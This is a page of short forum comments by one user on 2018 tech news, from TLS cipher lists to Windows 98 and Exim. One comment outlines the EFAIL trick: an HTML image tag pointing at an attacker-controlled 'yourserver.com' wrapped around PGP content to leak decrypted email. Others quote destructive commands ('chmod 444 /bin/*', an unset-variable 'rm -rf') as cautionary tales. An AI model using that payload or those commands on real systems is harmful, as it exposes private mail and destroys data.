Posts by Alan J. Wylie
645 publicly visible posts • joined 21 Aug 2009
Git365. Git for Teams. Quatermass and the Git Pit. GitHub simply won't do now Microsoft has it
Happy birthday, you lumbering MS-DOS-based mess: Windows 98 turns 20 today
Active Desktop, which allowed HTML content (such as news headlines) to be shown on the user's desktop at the cost of prodigious amounts of CPU and RAM.
And bandwidth. I can remember one cow-orker enabling it, which rapidly became apparent when we looked at the ISDN logs and discovered that his desktop, left on overnight, had been connecting every few minutes, bringing the line up over and over again, incurring a call charge every time.
UK footie fans furious as Sky Broadband goes TITSUP: Total inability to stream unfair penalties
Seems to have affected Zen Internet too
Routing & Core Network Loss of Resilience
They seem to have had redundancy and no outage.
One update of interest:
Engineers are continuing to work on the fibre break.
The work is currently being delayed by numerous road works.
It's time for TLS 1.0 and 1.1 to die (die, die)
Not only do they only support TLS1.0, but including RC4-SHA in their cipher list? Really?
Supported Server Cipher(s):
Preferred TLSv1.0 128 bits AES128-SHA
Accepted TLSv1.0 256 bits AES256-SHA
Accepted TLSv1.0 128 bits RC4-SHA
Accepted TLSv1.0 112 bits DES-CBC3-SHA
Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
Accepted TLSv1.0 128 bits RC4-MD5
User spent 20 minutes trying to move mouse cursor, without success
Sun optical mice, circa 1985
How many here remember the optical mice on early '80s Sun worksations?
There was a special mouse pad with horizontal and vertical lines on it.
New York State is trying to ban 'deepfakes' and Hollywood isn't happy
Re: Bullshit
So crafting a “digital replica” for films, adverts, musicals, for commercial purposes or without explicit written consent is violation of an individual’s rights."
And what about Woody Alllen's Zelig and Dead Men Don't Wear Plaid?
Void Linux gave itself to the void, Korora needs a long siesta – life is hard for small distros
PGP and S/MIME decryptors can leak plaintext from emails, says infosec professor
Re: It seems it's a vul'n in HTML parsing in some clients
The first of two (!) attacks does seem rather simple. Send email with three MIME parts: 1. <img src="http://yourserver.com/ " 2. [PGP encrypted content] 3. "> Mail client decrypts 2, concatenates three parts and does lookup on the URL which you control.
It seems it's a vul'n in HTML parsing in some clients
http://seclists.org/oss-sec/2018/q2/104
https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060315.html
T-Mobile owner sends in legal heavies to lean on small Brit biz over use of 'trademarked' magenta
We need a crowd-sourced distributed binary (hexagonal?) chop on the RGB triplets to find out exactly where the lawyers stop alleging that a particular shade infringes. We can then mock them mercilessly for claiming that one shade of magenta is OK and an indistinguishable one a fraction away in colour space doesn't.
UK age-checking smut overlord won't be able to handle the pressure – critics
US military base stores pull Huawei, ZTE kit off the shelves
Today's NCSC advice
ZTE: NCSC advice to select telecommunications operators with national security concerns
The NCSC has issued advice to a limited number of UK telecommunications operators regarding the potential use of ZTE equipment and services. ... NCSC assess that the national security risks arising from the use of ZTE equipment or services within the context of the existing UK telecommunications infrastructure cannot be mitigated
GitLab crawling back online after breaking its brain in two
gitlab vulnerabilities disclosed
I wonder whether the problem was as a result of these vulnerabilities being patched:
https://twitter.com/jobertabma/status/989708798515265539
Jobert Abma, 4:32 am - 27 Apr 2018
In December I found a number bugs in @gitlab, all of which were disclosed today. The team responded swiftly and professionally and is a pleasure to work with. I'll describe each vulnerability in a separate tweet in this thread. Enjoy them and happy hacking!
ISO blocks NSA's latest IoT encryption systems amid murky tales of backdoors and bullying
The ciphers look as if they will remain in the Linux kernel
http://lists.infradead.org/pipermail/linux-arm-kernel/2018-April/573548.html
Eric Biggers points out that there is no alternative block cipher suitable for low power processors to support dm-crypt or fscrypt filesystem encryption, and the alternative is no encryption at all.
Bruce Schneier's opinion is Personally, I doubt that they're backdoored
TSB outage, day 5: What do you mean you can't log in? Our systems are up and running. Up and running, we say!
loading failed for script
https://pbs.twimg.com/media/DbiPvH7WsAAj3Iu.jpg
"Loading failed for the <script> with the source "https://dpm.demdex.net/"...
"Loading failed for the <script> with the source "https://visitor-service.tealiumiq.com/"...
What on earth are these doing on a supposedly secure page?
The tech you're reading these words on – you have two Dundee uni boffins to thank for that
Re: Spear
Otto Frisch too, who founded Laser-Scan, which worked with RSRE on liquid crystal displays (see my earlier post).
RSRE and Laser-Scan
RSRE (as it had become by the early 80's) and Laser-Scan in Cambridge worked on an alternative to individually driven LCD pixels, by drawing vector graphics using an infra-red laser to switch the phase of the LCD.
Reference to 1984 paper: Laser-Addressed Liquid Crystal Displays
I can still remember the goggles, locked doors and notice: "Do not stare into laser beam with remaining eye".
Yahoo! fined! $35m! for! covering! up! massive! IT! security! screwup!
Re: How about fining BT for also failing to disclose the breach.
I would have thought that when BT contracted with Yahoo! to handle their customers' emails, there would have been self-congratulatory press releases on the subject, perhaps naming the muppets who at the time took the credit.
Can I find these anywhere using Google? Not a trace. The "Right to be forgotten" strikes again?
Good news: AI could solve the pension crisis – by triggering a nuclear apocalypse by 2040
AWS DNS network hijack turns MyEtherWallet into ThievesEtherWallet
Internet Engineering Task Force leaves home, gets own bank account
Infosec brainiacs release public dataset to classify new malware using AI
Boffins pull off quantum leap in true random number generation
Re: what about
It's not only got to be genuinely random (as John von Neumann said; "Any one who considers arithmetical methods of producing random digits is, of course, in a state of sin"), but if someone else has generated the randomness you are using for your Certificate Signing Request, you cannot guarantee the security of your website ever after.
Imagine you're having a CT scan and malware alters the radiation levels – it's doable
Re: Assumption is the mother of all fuck-ups:
"A naive assumption is often made that reusing software ... will increase safety because the software will have been exercised extensively. Reusing software modules does not guarantee safety in the new system to which they are transferred...
As demonstrated by the Ariane 5 Launch Faliure
Descent of the Machines: Aussie firm boasts of underwater drone swarms
not just submarines
more or less exclusively focused on detecting submarines
Mine hunting too. Many years ago I was a contractor at Ferranti, just before they went tits-up as a result of a massive fraud. Simulating sea-bed reflections for a Type 2093 sonar, also graphics for the camera on a ROV ("yellow submarine"). Massive (for those days) Silicon Graphics Onyx / R4400.
Cinema voucher-pusher tells customers: Cancel your credit cards, we've been 'attacked'
This was public back at the start of February
I saw a report about this and sent an e-mail containing the following link reporting a Filmology breach on 01-Feb-2018.
Digital air traffic control upgrade puts potential delays on London flights
Britain's 4G is slower than Armenia's
Super Cali goes ballistic, Starbucks is on notice: Expensive milky coffee is something quite cancerous
They'll be coming for our toast and chips next!
Microsoft loves Linux so much it wants someone else to build distros for its Windows Store
Seeing all the down votes, it prompted me to try and remember what it was that MS did almost 20 years ago to try and abuse the standards procedures. I was most amused to discover that googling for microsoft kerberos "nda" returns, as the top result, Embrace, extend, and extinguish
Manchester Arena attack: National Mutual Aid Telephony system failed
How do you make those darn code monkeys do what you want? Just give 'em a little nudge
Beware of the leopard
Make Things Easy / Politicians
The antithesis to this is if you don't want someone to do something, e.g. claim a tax refund, you make it as discouraging as possible.
Web forms that show you the new question only after you have answered the previous one, so you have to keep bothering the same person over and over again for the next answer.
Confusing instructions on web forms.
Long phone calls on hold with irritating music.
Being referred from one phone number to another.
That was my morning just wasted, and I'm sure that the Sir Humphreys of this world have big smug grins on their faces.
Fancy a viaduct? We have a wrought Victorian iron marvel to sell you
The Great McGonagall
Almost as bad as the Vogons'.
Beautiful Railway Bridge of the Silv’ry Tay!
Alas! I am very sorry to say
That ninety lives have been taken away
On the last Sabbath day of 1879,
Which will be remember’d for a very long time.
Take that, com-raid: US Treasury slaps financial sanctions on Russians for cyber-shenanigans, 2016 election meddling
MailChimp 'working' to stop hackers flinging malware-laced spam from accounts
I've been getting them: 10 in the past month, two only yesterday. I'd just blacklist their IPs but Let's Encrypt use them (mandrill.com / mandrillapp.com / mcsv.net / ROCKET SCIENCE GROUP are all MailChimp aliases).
List of delivery IPs here: https://mailchimp.com/about/ips/
Bad blood: Theranos CEO charged with massive fraud
"Innovators who seek to revolutionize and disrupt an industry must tell investors the truth about what their technology can do today, not just what they hope it might do someday."
Magic Leap are you listening?
Privacy folk raise alarm over schools snooping on kids' online habits
In 2003 I was working on web proxies for schools: Squid + DansGuardian plus a lot of customisation to allow teachers to turn all internet access on and off, allow only white-listed sites tailored for that particular lesson and block sites on demand. I'd hope that 100% of schools would have some sort of web filtering system.
In those days of limited bandwidth we even had an option to pre-load the Squid cache before the lesson started.
Tracking individual children, however, is a different matter.
Developer mistakenly deleted data - so thoroughly nobody could pin it on him!
That was heroic and ingenious.
My rescue mission to get the system back to normal after someone had typed
chmod 444 /bin/*involved an 8" floppy and driving from Keighley to Peterborough (about 140 miles) and back.
One moral of the story, which I am still trying to instil into my cow-orkers 30 years later, is use the symbolic modes to add or subtract explicit permissions.
And for today:
X-Clacks-Overhead: GNU Terry Pratchett
Two years ago
Valve Steam CLEANS Linux PCs (if you're not careful)
Dodgy shell script triggers classic rm -rf /
rm -rf "$STEAMROOT/"*
But STEAMROOT had not been set
Buffer overflow in Unix mailer Exim imperils 400,000 email servers
The bug was reported to the Exim team on Monday
The bug was reported to the Exim maintainers on the 5th Febrary, then under an NDA to distros and cloud services. What has just happened is that Mel has released more (but not full) details. There's no public POC either.
There was a bit of a panic when one distro broke the embargo and the patch became public a few days early, on a Friday of all days in the week.